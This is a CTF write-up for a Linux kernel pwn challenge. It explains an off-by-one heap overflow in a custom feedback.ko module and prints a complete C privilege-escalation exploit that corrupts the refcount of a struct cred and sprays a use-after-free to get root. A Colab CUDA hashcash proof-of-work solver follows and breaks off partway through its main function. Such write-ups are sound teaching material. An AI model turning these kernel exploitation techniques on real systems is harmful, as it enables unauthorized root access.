Feedback

CTF: VulnByDefault CTF
Challenge: Feedback (Student Feedback)
Category: Pwn (Linux Kernel)
Flag: VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}

1. Challenge Overview

The challenge provides a remote Linux VM running a custom kernel module called feedback.ko. Connecting to the server requires solving a hashcash proof-of-work (a 32-bit SHA-1 partial preimage, i.e. a stamp whose hash starts with 32 zero bits) before being granted an unprivileged shell inside a QEMU virtual machine. From there, the goal is to exploit a vulnerability in the kernel module to escalate privileges to root and read the flag from /dev/sda.

Remote endpoint:

Host: ctf.vulnbydefault.com
Port: <changes each session>

On connect, the server sends a PoW challenge:

Send the output of: hashcash -mb32 <random_token>
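To make the PoW requirement concrete, here is a minimal Python sketch of how a hashcash-style stamp can be checked: hash the whole stamp string with SHA-1 and count the leading zero bits. The function names and the demo prefix are my own for illustration, and the real server may validate additional fields (date, resource) that this sketch ignores.

```python
import hashlib


def leading_zero_bits(digest: bytes) -> int:
    """Count the zero bits at the front of a digest."""
    bits = 0
    for byte in digest:
        if byte == 0:
            bits += 8
            continue
        bits += 8 - byte.bit_length()
        break
    return bits


def stamp_is_valid(stamp: str, bits: int) -> bool:
    """A stamp passes when SHA-1(stamp) starts with at least `bits` zero bits."""
    return leading_zero_bits(hashlib.sha1(stamp.encode()).digest()) >= bits


def solve_small(prefix: str, bits: int) -> str:
    """Brute-force a hex counter suffix; only practical for small `bits`."""
    counter = 0
    while True:
        stamp = f"{prefix}{counter:x}"
        if stamp_is_valid(stamp, bits):
            return stamp
        counter += 1


if __name__ == "__main__":
    # Hypothetical 12-bit demo prefix; the real challenge asks for 32 bits.
    demo = solve_small("1:12:260101:demo::gX0000:", 12)
    print(demo, stamp_is_valid(demo, 12))
```

At 12 bits this finishes almost instantly on a CPU; every extra bit doubles the expected work, which is why 32 bits pushed me towards a GPU.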

After solving and submitting the stamp, a minimal Linux system boots:

Saving 256 bits of non-creditable seed for next boot
Starting syslogd: OK
Starting klogd: OK
Running sysctl: OK
Starting network: OK
Starting crond: OK

-----------------------------
Welcome to Student Feedback
-----------------------------

~ $

2. Vulnerability Analysis

The feedback.ko kernel module exposes an ioctl-based interface with three operations:

FEEDBACK_ADD - allocate a feedback object
FEEDBACK_DEL - free a feedback object
FEEDBACK_GET - read back a feedback object
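As a cross-check, the request numbers for these three operations can be recomputed from the `_IOWR('s', n, struct request)` definitions in the exploit source. The sketch below assumes the asm-generic Linux ioctl encoding (as on x86-64) and a 64-bit layout where `struct request` is four 8-byte fields; both are assumptions about the target rather than something the challenge states.

```python
# Direction bits as used by the asm-generic ioctl encoding (assumption: x86-64-style layout).
IOC_WRITE = 1
IOC_READ = 2


def ioc(direction: int, type_char: str, nr: int, size: int) -> int:
    """Pack direction, size, type and number the way the kernel's _IOC macro does."""
    return (direction << 30) | (size << 16) | (ord(type_char) << 8) | nr


def iowr(type_char: str, nr: int, size: int) -> int:
    """Equivalent of _IOWR(type, nr, T) with sizeof(T) == size."""
    return ioc(IOC_READ | IOC_WRITE, type_char, nr, size)


# id, size, name pointer, feedback pointer: 4 x 8 bytes on a 64-bit target.
REQUEST_SIZE = 8 * 4

FEEDBACK_ADD = iowr("s", 0, REQUEST_SIZE)
FEEDBACK_DEL = iowr("s", 1, REQUEST_SIZE)
FEEDBACK_GET = iowr("s", 2, REQUEST_SIZE)

if __name__ == "__main__":
    for name, value in (("ADD", FEEDBACK_ADD), ("DEL", FEEDBACK_DEL), ("GET", FEEDBACK_GET)):
        print(f"FEEDBACK_{name} = {value:#010x}")
```

These values are handy when reading strace output or driving the device from a scripting language instead of C.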

The bug is a classic off-by-one heap overflow in the add handler:

feedback = kmalloc(size, GFP_KERNEL);
copy_from_user(feedback, user_feedback, size + 1); // copies size+1 bytes into size-byte allocation

This lets us overflow exactly 1 byte past the end of any heap chunk we allocate. All objects live in the kmalloc-192 slab (size = 0xc0), making the overflow target predictable.
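The effect of that single extra byte is easy to model in user space. The following Python sketch treats a slab as a flat bytearray of 0xc0-byte slots and mimics the vulnerable copy; it is only an illustration of the arithmetic, not a model of the real SLUB allocator, and `vulnerable_add` is a made-up name.

```python
CHUNK_SZ = 0xC0  # object size used throughout the exploit


def vulnerable_add(slab: bytearray, slot: int, user_data: bytes, size: int) -> None:
    """Mimic kmalloc(size) followed by copy_from_user(..., size + 1)."""
    start = slot * CHUNK_SZ
    # One byte more than the allocation: the last byte lands in the next slot.
    slab[start:start + size + 1] = user_data[:size + 1]


# Two adjacent slots; slot 1 plays the victim and is filled with 'V'.
slab = bytearray(b"V" * CHUNK_SZ * 2)
payload = b"A" * CHUNK_SZ + b"\x04"
vulnerable_add(slab, 0, payload, CHUNK_SZ)

if __name__ == "__main__":
    print(f"victim first byte: {slab[CHUNK_SZ]:#04x}")
    print(f"victim second byte: {slab[CHUNK_SZ + 1]:#04x}")
```

Only the first byte of the neighbouring slot changes, so whatever structure ends up in that slot needs something interesting at offset 0.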

3. Exploit Strategy

The exploit is leakless and timing-based - it doesn’t require any kernel address leaks. The strategy is:

Stage 1: Edge Finding

Allocate many feedback objects (IDs 1 through N) in kmalloc-192, each filled with a per-object byte ('A' + id mod 26) and the overflow byte set to 0x04.
After each allocation, scan all previous objects to detect whether any had its first byte changed to 0x04. If so, we have found an edge pair where object A's overflow reaches into object V.
Free every object, then reallocate the pair at fixed IDs (v=4001 first, then a=4002) and re-check that A's overflow byte still lands in V, so the edge is held stable.
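The scan logic can be tried out in a small simulation. The Python sketch below models the slab as a flat bytearray and hands out slots in a shuffled order as a stand-in for an unpredictable freelist; the real allocator behaves differently, so treat the layout model (and the names `find_edge`, `slot_of`) as assumptions made purely for illustration.

```python
import random

CHUNK_SZ = 0xC0
EDGE_MARK = 0x04


def find_edge(num_slots: int, seed: int = 0):
    """Allocate objects one by one and report the first (attacker, victim) pair."""
    rng = random.Random(seed)
    free_slots = list(range(num_slots))
    rng.shuffle(free_slots)  # stand-in for an unpredictable freelist order
    # One spare byte so the overflow from the last slot stays inside the buffer.
    slab = bytearray(CHUNK_SZ * num_slots + 1)
    slot_of = {}
    expected = {}
    for obj_id in range(1, num_slots + 1):
        slot = free_slots.pop()
        fill = ord("A") + obj_id % 26
        start = slot * CHUNK_SZ
        slab[start:start + CHUNK_SZ] = bytes([fill]) * CHUNK_SZ
        slab[start + CHUNK_SZ] = EDGE_MARK  # the off-by-one byte
        slot_of[obj_id] = slot
        expected[obj_id] = fill
        # Scan every earlier object for a first byte that turned into the marker.
        for other in range(1, obj_id):
            first = slab[slot_of[other] * CHUNK_SZ]
            if first != expected[other] and first == EDGE_MARK:
                return obj_id, other, slot_of
    return None


if __name__ == "__main__":
    result = find_edge(64, seed=1)
    if result:
        a, v, slots = result
        print(f"edge: object {a} (slot {slots[a]}) -> object {v} (slot {slots[v]})")
```

Because only the newest allocation writes in each round, the first marker that shows up always belongs to the slot directly after the object that was just added.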

Stage 2: Credential Corruption

Free the victim slot (V) so the kernel can reuse it.
On this target, the kernel's credential allocation path (prepare_creds, followed by commit_creds) ends up placing struct cred in the same kmalloc-192 slab.
The exploit re-executes itself and forks helper children, aiming for a live cred object to land in the freed victim slot.
Free and re-add object A with the chosen overflow byte (0x04) so that the overflow corrupts the low byte of the adjacent cred's refcount/usage field.
As the helper children exit and drop their references, the corrupted count reaches zero and the cred is freed prematurely while still in use.
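To see why one byte is enough, here is a small Python sketch of the refcount arithmetic. It assumes a little-endian counter at offset 0 of the object and uses a made-up starting count of 9; the real value depends on how many tasks share the cred at that moment, which I did not measure.

```python
import struct


def overwrite_low_byte(usage: int, new_byte: int) -> int:
    """Replace the least significant byte of a little-endian 64-bit counter."""
    raw = bytearray(struct.pack("<q", usage))
    raw[0] = new_byte
    return struct.unpack("<q", bytes(raw))[0]


def holders_left_at_free(real_holders: int, corrupted_usage: int) -> int:
    """Holders still using the object when the corrupted count reaches zero."""
    return real_holders - corrupted_usage


if __name__ == "__main__":
    real_holders = 9  # hypothetical number of live references
    corrupted = overwrite_low_byte(real_holders, 0x04)
    print(f"count after overflow: {corrupted}")
    print(f"holders left when freed: {holders_left_at_free(real_holders, corrupted)}")
```

The overflow byte has to be smaller than the true count for this to work, which is presumably why several values and helper-child counts are worth trying.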

Stage 3: Use-After-Free Spray

Spray execl("/bin/busybox", "busybox", "ping", "127.0.0.1") children in waves (the embedded source pins every spray child to CPU 0).
The freed cred slot gets reclaimed by the new cred of one of the spray processes.
If the reclaiming cred carries uid=0 / euid=0 (root), the process still holding the dangling cred pointer now runs with root credentials.
The now-root process reads /dev/sda and prints the flag.

Runtime Parameters (Tuples)

The exploit accepts timing parameters that control the race:

/tmp/e <overflow_byte> <spray_count> <ctrl_delay_ms> <spawn_gap_us> <dec_children> <dec_gap_us> <spray_waves> <wave_gap_ms>

Multiple tuples are tried to increase success probability:

0x04 220 10 900 3 2000 6 20   (primary)
0x04 220 6  900 3 2500 6 20
0x04 220 6  900 3 2000 6 20
0x04 220 8  900 3 2000 6 20
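For readability, the positional fields can be mapped to names. The Python sketch below parses one tuple into a dataclass (the class and function names are mine) and reproduces how the controller splits the spray count across waves, mirroring the `base`/`extra` arithmetic in `controller_main`.

```python
from dataclasses import dataclass


@dataclass
class RaceParams:
    overflow_byte: int
    spray_count: int
    ctrl_delay_ms: int
    spawn_gap_us: int
    dec_children: int
    dec_gap_us: int
    spray_waves: int
    wave_gap_ms: int


def parse_tuple(text: str) -> RaceParams:
    """Parse one whitespace-separated tuple; the first field may be hex."""
    fields = text.split()
    if len(fields) != 8:
        raise ValueError(f"expected 8 fields, got {len(fields)}")
    return RaceParams(int(fields[0], 0), *(int(f) for f in fields[1:]))


def wave_sizes(spray_count: int, waves: int) -> list:
    """Spread the spray evenly; the first `extra` waves get one more child."""
    base, extra = divmod(spray_count, waves)
    return [base + (1 if w < extra else 0) for w in range(waves)]


if __name__ == "__main__":
    params = parse_tuple("0x04 220 10 900 3 2000 6 20")
    print(params)
    print(wave_sizes(params.spray_count, params.spray_waves))
```

With the primary tuple, 220 spray children over 6 waves come out as four waves of 37 and two of 36.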

Embedded Exploit Source

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Argument block passed to every feedback ioctl. */
struct request {
    uint64_t id;
    uint64_t size;
    void *name;
    void *feedback;
};

#define FEEDBACK_ADD _IOWR('s', 0, struct request)
#define FEEDBACK_DEL _IOWR('s', 1, struct request)
#define FEEDBACK_GET _IOWR('s', 2, struct request)

static const uint64_t CHUNK_SZ = 0xc0;
static const unsigned char EDGE_MARK = 0x04;
static int g_fd = -1;

/* Pin the calling process to a single CPU (best effort). */
static void pin_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    (void)sched_setaffinity(0, sizeof(set), &set);
}

/* ioctl wrapper that returns -errno on failure. */
static int xio(unsigned long cmd, struct request *req) {
    int ret = ioctl(g_fd, cmd, req);
    return (ret < 0) ? -errno : ret;
}

/* Allocate an object filled with `fill`; `over` is the one overflowing byte. */
static int add_obj(uint64_t id, unsigned char fill, unsigned char over) {
    char *name = calloc(1, 0x100);
    char *data = calloc(1, CHUNK_SZ + 1);
    if (!name || !data) {
        free(name);
        free(data);
        return -1;
    }
    memset(name, 'N', 0xff);
    memset(data, fill, CHUNK_SZ);
    data[CHUNK_SZ] = (char)over;
    struct request req = {.id = id, .size = CHUNK_SZ, .name = name, .feedback = data};
    int ret = xio(FEEDBACK_ADD, &req);
    free(name);
    free(data);
    return ret;
}

static int del_obj(uint64_t id) {
    struct request req = {.id = id};
    return xio(FEEDBACK_DEL, &req);
}

/* Read an object back and return its first byte through `b`. */
static int get_first(uint64_t id, unsigned char *b) {
    unsigned char *buf = calloc(1, CHUNK_SZ + 1);
    if (!buf) {
        return -1;
    }
    struct request req = {.id = id, .feedback = buf};
    int ret = xio(FEEDBACK_GET, &req);
    if (ret >= 0) {
        *b = buf[0];
    }
    free(buf);
    return ret;
}

/* Stage 1: find an adjacent (attacker, victim) pair and rebuild it at fixed IDs. */
static int find_edge_and_clean(int *out_a, int *out_v, int max_ids) {
    unsigned char expected[5000];
    unsigned char active[5000];
    memset(expected, 0, sizeof(expected));
    memset(active, 0, sizeof(active));

    int a = -1, v = -1, max_used = -1;
    for (int i = 1; i <= max_ids; i++) {
        unsigned char fill = (unsigned char)('A' + (i % 26));
        if (add_obj((uint64_t)i, fill, EDGE_MARK) < 0) {
            return -1;
        }
        expected[i] = fill;
        active[i] = 1;

        for (int j = 1; j < i; j++) {
            if (!active[j]) {
                continue;
            }
            unsigned char now = 0;
            if (get_first((uint64_t)j, &now) < 0) {
                continue;
            }
            if (now != expected[j]) {
                if (now == EDGE_MARK && expected[j] != EDGE_MARK) {
                    a = i;
                    v = j;
                    max_used = i;
                    goto found;
                }
                expected[j] = now;
            }
        }
    }
    for (int i = 1; i <= max_ids; i++) {
        (void)del_obj((uint64_t)i);
    }
    return -1;

found:
    for (int i = 1; i <= max_used; i++) {
        if (i == a || i == v) {
            continue;
        }
        (void)del_obj((uint64_t)i);
    }

    if (del_obj((uint64_t)a) < 0 || del_obj((uint64_t)v) < 0) {
        return -1;
    }

    const int rv = 4001;
    const int ra = 4002;
    if (add_obj((uint64_t)rv, 'X', 0x00) < 0) {
        return -1;
    }
    if (add_obj((uint64_t)ra, 'Y', EDGE_MARK) < 0) {
        (void)del_obj((uint64_t)rv);
        return -1;
    }

    /* Confirm the rebuilt pair is still adjacent. */
    unsigned char chk = 0;
    if (get_first((uint64_t)rv, &chk) < 0 || chk != EDGE_MARK) {
        (void)del_obj((uint64_t)ra);
        (void)del_obj((uint64_t)rv);
        return -1;
    }

    *out_a = ra;
    *out_v = rv;
    return 0;
}

/* Succeeds only once the process is privileged enough to open /dev/sda. */
static int read_flag_device(void) {
    int fd = open("/dev/sda", O_RDONLY);
    if (fd < 0) {
        return -1;
    }
    char buf[0x400];
    ssize_t n = read(fd, buf, sizeof(buf));
    close(fd);
    if (n <= 0) {
        return -1;
    }
    /* sizeof - 1 so the trailing newline of the header is written too. */
    static const char hdr[] = "\n[+] /dev/sda dump:\n";
    write(1, hdr, sizeof(hdr) - 1);
    write(1, buf, (size_t)n);
    write(1, "\n", 1);
    return 0;
}

/* Spray child: silence output and exec busybox ping. */
static void exec_root_ping_on_cpu(int cpu) {
    pin_cpu(cpu % 4);
    int dn = open("/tmp/.spray_sink", O_WRONLY | O_CREAT | O_APPEND, 0600);
    if (dn >= 0) {
        dup2(dn, 1);
        dup2(dn, 2);
        close(dn);
    }
    execl("/bin/busybox", "busybox", "ping", "127.0.0.1", NULL);
    _exit(127);
}

/* Controller: waits for the go signal, then forks the spray in waves. */
static int controller_main(void) {
    pin_cpu(0);

    int fd = -1;
    int delay_ms = 8;
    int nping = 220;
    int spawn_us = 900;
    int waves = 6;
    int wave_gap_ms = 20;
    const char *s;

    s = getenv("CTL_FD");
    if (!s) {
        return 1;
    }
    fd = atoi(s);

    s = getenv("CTL_DELAY");
    if (s) {
        delay_ms = atoi(s);
    }
    s = getenv("PINGN");
    if (s) {
        nping = atoi(s);
    }
    s = getenv("SPAWN_US");
    if (s) {
        spawn_us = atoi(s);
    }
    s = getenv("WAVES");
    if (s) {
        waves = atoi(s);
    }
    s = getenv("WAVEGAP");
    if (s) {
        wave_gap_ms = atoi(s);
    }

    /* Clamp parameters to sane ranges. */
    if (delay_ms < 0) {
        delay_ms = 0;
    }
    if (nping < 1) {
        nping = 1;
    }
    if (nping > 350) {
        nping = 350;
    }
    if (spawn_us < 200) {
        spawn_us = 200;
    }
    if (waves < 1) {
        waves = 1;
    }
    if (waves > 16) {
        waves = 16;
    }
    if (wave_gap_ms < 0) {
        wave_gap_ms = 0;
    }
    if (wave_gap_ms > 200) {
        wave_gap_ms = 200;
    }

    /* Block until stage 2 signals that the overflow has been placed. */
    char c = 0;
    if (read(fd, &c, 1) <= 0) {
        _exit(1);
    }
    close(fd);

    usleep((useconds_t)delay_ms * 1000);

    int base = nping / waves;
    int extra = nping % waves;
    for (int w = 0; w < waves; w++) {
        int cnt = base + ((w < extra) ? 1 : 0);
        for (int i = 0; i < cnt; i++) {
            pid_t p = fork();
            if (p == 0) {
                exec_root_ping_on_cpu(0);
            }
            usleep((useconds_t)spawn_us);
        }
        if (w + 1 < waves && wave_gap_ms > 0) {
            usleep((useconds_t)wave_gap_ms * 1000);
        }
    }

    for (;;) {
        sleep(1000);
    }
}

/* Stage 2: corrupt the adjacent object, release references, poll for root. */
static int stage2_main(void) {
    const char *fd_s = getenv("FBFD");
    const char *over_s = getenv("OVERB");
    const char *aid_s = getenv("AID");
    const char *dec_s = getenv("DECN");
    const char *decgap_s = getenv("DECGAP");
    unsigned char over_b = 0x06;
    int a_id = -1;
    int ndec = 5;
    int dec_gap_us = 0;

    if (!fd_s || !aid_s) {
        puts("[-] stage2 missing env");
        return 1;
    }
    if (over_s) {
        over_b = (unsigned char)strtoul(over_s, NULL, 0);
    }
    if (dec_s) {
        ndec = atoi(dec_s);
    }
    if (decgap_s) {
        dec_gap_us = atoi(decgap_s);
    }
    if (ndec < 1) {
        ndec = 1;
    }
    if (ndec > 16) {
        ndec = 16;
    }
    if (dec_gap_us < 0) {
        dec_gap_us = 0;
    }
    if (dec_gap_us > 50000) {
        dec_gap_us = 50000;
    }

    pin_cpu(0);
    g_fd = atoi(fd_s);
    a_id = atoi(aid_s);
    printf("[*] stage2 uid=%d euid=%d over=0x%02x a_id=%d dec=%d decgap=%d\n",
           getuid(), geteuid(), over_b, a_id, ndec, dec_gap_us);

    /* Helper children block on a pipe and exit when told to. */
    int dec_go[16][2];
    memset(dec_go, 0, sizeof(dec_go));
    for (int i = 0; i < ndec; i++) {
        if (pipe(dec_go[i]) < 0) {
            puts("[-] dec pipe failed");
            return 1;
        }
        pid_t c = fork();
        if (c == 0) {
            close(dec_go[i][1]);
            char b = 0;
            if (read(dec_go[i][0], &b, 1) <= 0) {
                _exit(1);
            }
            close(dec_go[i][0]);
            pin_cpu(0);
            _exit(0);
        }
        close(dec_go[i][0]);
    }

    int ctl_go[2];
    if (pipe(ctl_go) < 0) {
        puts("[-] ctl pipe failed");
        return 1;
    }

    char ctl_fd_buf[32];
    snprintf(ctl_fd_buf, sizeof(ctl_fd_buf), "%d", ctl_go[0]);
    pid_t ctl = fork();
    if (ctl == 0) {
        close(ctl_go[1]);
        setenv("STAGE_CTRL", "1", 1);
        setenv("CTL_FD", ctl_fd_buf, 1);
        unsetenv("STAGE2");
        execl("/proc/self/exe", "exploit", NULL);
        _exit(127);
    }
    if (ctl < 0) {
        puts("[-] fork controller failed");
        return 1;
    }

    close(ctl_go[0]);

    /* Re-place A so its overflow byte hits whatever now occupies V's slot. */
    if (del_obj((uint64_t)a_id) < 0) {
        puts("[-] stage2 failed to free A");
        return 1;
    }
    if (add_obj(100001, 'A', over_b) < 0) {
        puts("[-] stage2 attacker add failed");
        return 1;
    }

    if (write(ctl_go[1], "C", 1) != 1) {
        puts("[-] stage2 ctl signal failed");
        return 1;
    }

    /* Release the helper children one by one. */
    for (int i = 0; i < ndec; i++) {
        (void)write(dec_go[i][1], "D", 1);
        close(dec_go[i][1]);
        if (dec_gap_us > 0 && i + 1 < ndec) {
            usleep((useconds_t)dec_gap_us);
        }
    }

    /* Busy-wait instead of sleeping while the spray runs. */
    for (volatile unsigned long warm = 0; warm < 60000000UL; warm++) {
    }

    for (int attempt = 0; attempt < 500; attempt++) {
        if (read_flag_device() == 0) {
            for (;;) {
                sleep(1000);
            }
        }
        for (volatile unsigned long spin = 0; spin < 4000000UL; spin++) {
        }
    }

    for (;;) {
        sleep(1000);
    }
}

int main(int argc, char **argv) {
    /* The same binary serves as stage 1, stage 2 and controller. */
    const char *ctrl = getenv("STAGE_CTRL");
    if (ctrl && !strcmp(ctrl, "1")) {
        return controller_main();
    }

    const char *st = getenv("STAGE2");
    if (st && !strcmp(st, "1")) {
        return stage2_main();
    }

    unsigned char over_b = 0x06;
    int nping = 220;
    int cdelay = 6;
    int spawn_us = 900;
    int ndec = 5;
    int dec_gap_us = 0;
    int waves = 6;
    int wave_gap_ms = 20;

    if (argc > 1) {
        over_b = (unsigned char)strtoul(argv[1], NULL, 0);
    }
    if (argc > 2) {
        nping = atoi(argv[2]);
    }
    if (argc > 3) {
        cdelay = atoi(argv[3]);
    }
    if (argc > 4) {
        spawn_us = atoi(argv[4]);
    }
    if (argc > 5) {
        ndec = atoi(argv[5]);
    }
    if (argc > 6) {
        dec_gap_us = atoi(argv[6]);
    }
    if (argc > 7) {
        waves = atoi(argv[7]);
    }
    if (argc > 8) {
        wave_gap_ms = atoi(argv[8]);
    }

    pin_cpu(0);
    printf("[*] stage1 uid=%d euid=%d over=0x%02x ping=%d cdelay=%d spawn_us=%d dec=%d decgap=%d waves=%d wavegap=%d\n",
           (int)getuid(), (int)geteuid(), over_b, nping, cdelay, spawn_us, ndec, dec_gap_us, waves, wave_gap_ms);

    g_fd = open("/dev/feedback", O_RDWR);
    if (g_fd < 0) {
        perror("open /dev/feedback");
        return 1;
    }

    int a = -1, v = -1;
    if (find_edge_and_clean(&a, &v, 900) < 0 &&
        find_edge_and_clean(&a, &v, 1400) < 0) {
        puts("[-] stage1 no edge found");
        return 1;
    }
    printf("[*] stage1 edge a=%d -> v=%d (cleaned)\n", a, v);

    /* Free V right before re-exec so its slot is available for reuse. */
    if (del_obj((uint64_t)v) < 0) {
        puts("[-] stage1 free V failed");
        return 1;
    }

    char fd_buf[32], over_buf[16], aid_buf[16], ping_buf[16], delay_buf[16], spawn_buf[16], dec_buf[16], decgap_buf[16], waves_buf[16], wavegap_buf[16];
    snprintf(fd_buf, sizeof(fd_buf), "%d", g_fd);
    snprintf(over_buf, sizeof(over_buf), "0x%02x", over_b);
    snprintf(aid_buf, sizeof(aid_buf), "%d", a);
    snprintf(ping_buf, sizeof(ping_buf), "%d", nping);
    snprintf(delay_buf, sizeof(delay_buf), "%d", cdelay);
    snprintf(spawn_buf, sizeof(spawn_buf), "%d", spawn_us);
    snprintf(dec_buf, sizeof(dec_buf), "%d", ndec);
    snprintf(decgap_buf, sizeof(decgap_buf), "%d", dec_gap_us);
    snprintf(waves_buf, sizeof(waves_buf), "%d", waves);
    snprintf(wavegap_buf, sizeof(wavegap_buf), "%d", wave_gap_ms);

    setenv("STAGE2", "1", 1);
    setenv("FBFD", fd_buf, 1);
    setenv("OVERB", over_buf, 1);
    setenv("AID", aid_buf, 1);
    setenv("PINGN", ping_buf, 1);
    setenv("CTL_DELAY", delay_buf, 1);
    setenv("SPAWN_US", spawn_buf, 1);
    setenv("DECN", dec_buf, 1);
    setenv("DECGAP", decgap_buf, 1);
    setenv("WAVES", waves_buf, 1);
    setenv("WAVEGAP", wavegap_buf, 1);
    unsetenv("STAGE_CTRL");
    unsetenv("CTL_FD");

    execl("/proc/self/exe", "exploit", NULL);
    perror("execl");
    return 1;
}

4. The PoW Problem and GPU Solution

The server requires a 32-bit hashcash proof-of-work before granting access. Solving this on CPU takes too long (minutes to hours), so I used a GPU-assisted approach.

Solution: Use Google Colab’s free GPU (NVIDIA T4) to brute-force the hashcash stamp via a custom CUDA kernel.

The CUDA solver implements SHA1 hashing on the GPU:

Each GPU thread tries a different nonce suffix.
65535 blocks x 1024 threads = ~67 million hashes per kernel launch.
On a T4 GPU, this finds a valid 32-bit stamp in seconds.
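The numbers above can be sanity-checked with a few lines of Python. This is a back-of-the-envelope sketch that treats every hash as an independent trial with success probability 2^-32; it says nothing about actual T4 throughput, which I did not benchmark.

```python
import math

BLOCKS = 65535
THREADS = 1024
BITS = 32

# Candidates tested by one kernel launch.
hashes_per_launch = BLOCKS * THREADS

# Expected number of trials until the first success of a geometric process.
expected_hashes = 2 ** BITS
expected_launches = expected_hashes / hashes_per_launch


def success_probability(launches: int) -> float:
    """Chance that at least one valid stamp shows up within `launches` launches."""
    trials = launches * hashes_per_launch
    return -math.expm1(trials * math.log1p(-(2.0 ** -BITS)))


if __name__ == "__main__":
    print(f"hashes per launch: {hashes_per_launch:,}")
    print(f"expected launches: {expected_launches:.2f}")
    print(f"P(success within 64 launches): {success_probability(64):.3f}")
```

So a typical run needs on the order of 64 launches, with a fair amount of variance: roughly a third of runs take longer than that.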

Google Colab CUDA Solver (`colab gpu.py`)

This script is meant to run entirely in a Google Colab cell. It:

Asks the user to paste the PoW challenge line from the server
Compiles a CUDA solver with nvcc
Runs it on the Colab GPU
Outputs the solved stamp for copy-paste back to the local terminal

#!/usr/bin/env python3
"""
=================================================================
 STANDALONE CUDA HASHCASH POW SOLVER FOR GOOGLE COLAB
=================================================================
This script asks you to enter the POW challenge from the server,
then compiles and runs a GPU-accelerated solver.

USAGE IN GOOGLE COLAB:
1. Run this entire script in a code cell
2. When prompted, paste the POW challenge line from server
   Example: hashcash -mb26 1fe36e63f5f0cdfd
3. Copy the output stamp and paste it back to your local terminal

=================================================================
"""
import subprocess
import re
import sys

# ==========================================
# STEP 1: Get POW Challenge from User
# ==========================================
print("=" * 70)
print("  CUDA HASHCASH POW SOLVER - Google Colab Edition")
print("=" * 70)
print()
print("Paste the POW challenge line from the server below:")
print("   Example: hashcash -mb26 1fe36e63f5f0cdfd")
print()

try:
    pow_line = input("POW Challenge: ").strip()
except (EOFError, KeyboardInterrupt):
    print("\nNo input received. Exiting.")
    sys.exit(1)

# Parse the challenge
m = re.search(r'hashcash\s+-mb(\d+)\s+(\S+)', pow_line)
if not m:
    print(f"\nInvalid POW format. Got: {pow_line}")
    print("   Expected format: hashcash -mb<BITS> <TOKEN>")
    sys.exit(1)

bits = m.group(1)
token = m.group(2)

print()
print("Parsed POW Challenge:")
print(f"   Bits: {bits}")
print(f"   Token: {token}")
print()

# ==========================================
# STEP 2: Compile CUDA Solver
# ==========================================
CUDA_SOLVER_CODE = r"""
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

__device__ uint32_t rol(uint32_t val, int bits) {
    return (val << bits) | (val >> (32 - bits));
}

// SHA-1 compression of a single 64-byte block, using a 16-word rolling schedule.
__device__ void sha1_block(uint32_t* h, const uint8_t* block) {
    uint32_t w[16];

    #pragma unroll
    for (int i = 0; i < 16; i++) {
        w[i] = (block[i*4] << 24) | (block[i*4+1] << 16) | (block[i*4+2] << 8) | block[i*4+3];
    }

    uint32_t a = h[0], b = h[1], c = h[2], d = h[3], e = h[4];

    #pragma unroll
    for (int i = 0; i < 80; i++) {
        uint32_t f, k, temp_w;
        if (i < 20)      { f = (b & c) | ((~b) & d); k = 0x5A827999; }
        else if (i < 40) { f = b ^ c ^ d;            k = 0x6ED9EBA1; }
        else if (i < 60) { f = (b & c) | (b & d) | (c & d); k = 0x8F1BBCDC; }
        else             { f = b ^ c ^ d;            k = 0xCA62C1D6; }

        if (i < 16) {
            temp_w = w[i];
        } else {
            temp_w = rol(w[(i-3)&15] ^ w[(i-8)&15] ^ w[(i-14)&15] ^ w[(i-16)&15], 1);
            w[i&15] = temp_w;
        }

        uint32_t temp = rol(a, 5) + f + e + k + temp_w;
        e = d; d = c; c = rol(b, 30); b = a; a = temp;
    }

    h[0] += a; h[1] += b; h[2] += c; h[3] += d; h[4] += e;
}

// Each thread appends its own hex counter to the prefix and hashes the result.
// The stamp must fit in one SHA-1 block (prefix + suffix <= 55 bytes).
__global__ void hashcash_kernel(int bits, const char* prefix, int prefix_len,
                                 uint64_t* found_counter, int* success_flag, uint64_t offset) {
    uint64_t tid = offset + ((uint64_t)blockIdx.x * blockDim.x + threadIdx.x);
    if (*success_flag) return;

    uint8_t buffer[64];
    for(int i = 0; i < prefix_len; i++) buffer[i] = prefix[i];

    char hex_chars[] = "0123456789abcdef";
    uint64_t temp_tid = tid;
    int suffix_len = 0;
    char suffix[16];

    if (temp_tid == 0) {
        suffix[0] = '0';
        suffix_len = 1;
    } else {
        while(temp_tid > 0) {
            suffix[suffix_len++] = hex_chars[temp_tid % 16];
            temp_tid /= 16;
        }
    }

    for(int i = 0; i < suffix_len; i++) {
        buffer[prefix_len + i] = suffix[suffix_len - 1 - i];
    }

    // SHA-1 padding: 0x80, zeros, then the message length in bits (big-endian).
    int total_len = prefix_len + suffix_len;
    buffer[total_len] = 0x80;
    for (int i = total_len + 1; i < 62; i++) {
        buffer[i] = 0;
    }

    uint64_t bit_len = total_len * 8;
    buffer[63] = bit_len & 0xFF;
    buffer[62] = (bit_len >> 8) & 0xFF;

    uint32_t h[5] = { 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0 };
    sha1_block(h, buffer);

    // Count leading zero bits of the digest.
    int zero_bits = 0;
    for (int i = 0; i < 5; i++) {
        uint32_t val = h[i];
        if (val == 0) {
            zero_bits += 32;
        } else {
            for (int k = 31; k >= 0; k--) {
                if ((val >> k) & 1) break;
                zero_bits++;
            }
            break;
        }
    }

    if (zero_bits >= bits) {
        if (atomicCAS(success_flag, 0, 1) == 0) {
            *found_counter = tid;
        }
    }
}

int main(int argc, char** argv) {
    if (argc < 3) return 1;
    int bits = atoi(argv[1]);
    const char* resource = argv[2];

    char host_prefix[256];
    time_t t = time(NULL);
    struct tm tm_utc;
    gmtime_r(&t, &tm_utc);
    char date[16];
    strftime(date, sizeof(date), "%y%m%d", &tm_utc);
    srand(time(NULL));

    // Stamp layout: 1:<bits>:<date>:<resource>::<random>:<counter>
    snprintf(host_prefix, sizeof(host_prefix), "1:%d:%s:%s::gX%04d:",
             bits, date, resource, rand() % 10000);
    int prefix_len = strlen(host_prefix);

    char *d_prefix;
